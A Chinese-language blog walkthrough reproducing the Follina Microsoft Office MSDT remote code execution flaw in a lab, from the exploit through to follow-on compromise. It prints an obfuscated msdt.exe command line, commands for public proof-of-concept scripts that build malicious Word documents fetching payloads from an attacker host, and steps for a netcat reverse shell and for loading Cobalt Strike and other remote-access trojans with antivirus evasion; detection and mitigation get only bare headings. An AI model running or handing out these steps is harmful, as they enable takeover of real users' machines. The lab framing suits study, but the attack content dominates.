Microsoft Office MSDT 代码执行漏洞

该漏洞首次发现在2022 年 5 月 27 日，由白俄罗斯的一个 IP 地址上传。恶意文档从 Word 远程模板功能从远程 Web 服务器检索 HTML 文件，通过 ms-msdt MSProtocol URI方法来执行恶意PowerShell代码。感染过程利用 Windows 程序 msdt.exe，该程序用于运行各种 Windows 疑难解答程序包。此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下，恶意文档依旧可以使用 ms-msdt URI执行任意PowerShell代码。

目前已知影响的版本为：

office 2021 Lts

office 2019

office 2016

Office 2013

Office ProPlus

Office 365

msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"

在cmd中运行即可弹出计算器：

office下载地址：

https://otp.landian.vip/zh-cn/download.html

因为已经部署好了，简单截图说明一下：

windows环境用了：

攻击机ip：192.168.84.205

目标靶机ip：192.168.84.185

下载地址：

https://github.com/chvancooten/follina.py

在攻击机执行：

python3 .follina.py -t docx -m binary -b windowssystem32calc.exe -u 192.168.84.205

生成恶意docx文档：

将clickme.docx放在靶机打开：

这里远程加载恶意文件，生活中遇到这种情况可以警惕了。
程序错误诊断，然后弹出计算器：

攻击机可以看到远程加载请求：

复现成功。
我们肯定不满足于弹出计算器，如何深度利用获取权限呢？

poc1的命令执行没看懂。
下载地址：

https://github.com/JohnHammond/msdt-follina

在cs上生成木马，这个不用多说。
创建pocexe文件夹，将nc，cs木马放进去，并在该目录下开启简单的http.server

服务：

开启服务：
python -m http.server 8080

改poc（follina.py）文件下载路径：

生成恶意文档：
python follina.py -i 192.168.84.205 -p 8000 -r 5555 #-r为反弹shell的端口，这里暂时用不到

将生成的follina.doc放在靶机打开：

上线

改poc配置：

执行命令：
python follina.py -i 192.168.84.205 -p 8000 -r 5555 #这里用到了 -r 反弹shell

将生成得doc文档放在靶机执行：

反弹shell成功：

看到nc运行：

用了7.5的版本，9.5的版本在虚拟机运行报错，大半天都没解决。生成木马：

系统设置，配置监听端口：

然后与上面的两种方式一样，加载大灰狼木马

目标机运行：

上线：

免杀做好，还是比较强大的：

将doc文件后缀改为zip：

解压：

可以根据这个ip溯源反制。

检测的思路：

以管理员身份运行命令提示符，执行以下两条命令：

撤消解决方法：

对大佬们的文章进行了资源整合。这里仅作线下学习，如有违法行为，与本人无关。

参考文章：

https://blog.csdn.net/weixin_45329947/article/details/125089243

https://www.cnblogs.com/bonelee/p/16337291.html

结尾：本文出自掌控社区-zhang3